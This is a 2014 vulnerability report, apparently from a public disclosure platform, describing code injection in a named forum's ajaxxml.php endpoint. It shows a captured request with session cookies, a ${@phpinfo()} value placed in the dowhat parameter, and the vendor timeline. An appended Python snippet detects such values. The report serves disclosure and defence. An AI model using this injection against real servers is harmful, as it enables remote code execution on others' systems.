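2014-04-22: Details reported to the vendor; waiting for the vendor to handle them.
2014-04-27: The vendor has actively ignored the vulnerability; details disclosed to the public.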
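Arbitrary code execution, you know what that means.
The problem is in the forum at http://bbs.jianshe99.com/. First, open any post and send flowers.
Capture the request: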
POST /ajaxxml.php HTTP/1.1
Host: bbs.jianshe99.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://bbs.jianshe99.com/forum-5-195/topic-1640176.html
Content-Length: 43
Cookie: Hm_lvt_b1646d7bf285efa474ea14b737e85446=1398006309,1398038153,1398038200,1398098132; CNZZDATA30039606=cnzz_eid%3D1561868909-1397929499-%26ntime%3D1398098133%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132385%26rtime%3D2; CNZZDATA30036801=cnzz_eid%3D1271367639-1397929499-%26ntime%3D1398098130%26cnzz_a%3D3%26sin%3Dnone%26ltime%3D1398098132527%26rtime%3D2; Hm_lvt_d7689cf300ad742cd047593afd7f1d2f=1397927729,1397953140,1397990922,1398098120; Hm_lvt_89a2a3bf00cfac7dc961b07b7b987201=1397991764,1397992593,1397995371,1398098120; __utma=140739757.702307227.1397998349.1398047437.1398049746.5; __utmz=140739757.1398034245.3.3.utmcsr=jianshe99.com|utmccn=(referral)|utmcmd=referral|utmcct=/global/login-new.html; MemberEmail=""; emailNotify=0; BIGipServernew_bbs_pool=2030083539.20480.0000; Hm_lpvt_d7689cf300ad742cd047593afd7f1d2f=1398098120; Hm_lpvt_89a2a3bf00cfac7dc961b07b7b987201=1398098120; SID=459274e4bcb7dc35eb1684a125a1c4a9; Hm_lpvt_b1646d7bf285efa474ea14b737e85446=1398098328; ssouid=a1095150228%40jianshe99.com; viewtopics=W1606386W1651999W1640176; topictimestamp=Wtopic1606386%2A1397469668Wtopic1651999%2A1398006517Wtopic1640176%2A1398067880; VFIDS:4=0%2C7%2C195%2C6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

act=plv&dowhat=canFlower&fid=195&rand=84375
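The problem is the dowhat parameter when it is set to ${@phpinfo()}. Then we go to http://bbs.jianshe99.com/ajaxxml.php, intercept the request, change the value after dowhat, and send the POST, hehe.
Haha, and there it is.
As for the impact, I won't go into it and didn't dig deeper: no shell taken, no user balances viewed.
You get it, haha. By the way, last time you seemed a bit like an irresponsible vendor.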
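Severity: no impact (ignored by vendor)
Ignored at: 2014-04-27 12:19
2014-04-28: Confirmed, thank you for your attention.
2014-04-28: It seems the author left no contact address; we have just asked for one. There is a gift to send, thank you.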
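
A defensive check for the request shown in this report, added here as an example (it is not code from the report or from the vendor): it inspects a urlencoded POST body, flags PHP string-interpolation syntax such as the ${...} value placed in dowhat, and rejects action parameters that are not plain identifiers. The function names, the assumption that act and dowhat only ever carry identifier-like tokens, and the sample bodies in the comments are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# PHP "complex variable" syntax inside a string value: ${ ... } or {$ ... }
PHP_INTERP = re.compile(r"\$\{.*?\}|\{\$.*?\}", re.S)
# Assumption: action names are short plain identifiers (e.g. canFlower).
SAFE_TOKEN = re.compile(r"^[A-Za-z][A-Za-z0-9_]{0,31}$")
# Action-style parameters seen in the captured request.
TOKEN_PARAMS = {"act", "dowhat"}


def fully_decode(value, rounds=3):
    """URL-decode repeatedly so doubly encoded values are also inspected."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return (parameter, reason) findings for one urlencoded POST body."""
    findings = []
    # parse_qsl performs the first round of URL decoding itself.
    for name, raw in parse_qsl(body, keep_blank_values=True):
        value = fully_decode(raw)
        if PHP_INTERP.search(value):
            findings.append((name, "php-interpolation"))
        elif name in TOKEN_PARAMS and not SAFE_TOKEN.match(value):
            findings.append((name, "not-a-plain-token"))
    return findings


if __name__ == "__main__":
    # Constructed samples: the original body, then the modified one.
    for sample in (
        "act=plv&dowhat=canFlower&fid=195&rand=84375",
        "act=plv&dowhat=${@phpinfo()}&fid=195&rand=84375",
    ):
        print(sample, "->", inspect_body(sample))
```

The same allowlist idea belongs in the server-side handler: map dowhat to a fixed set of known actions and never pass the raw value into anything that evaluates strings.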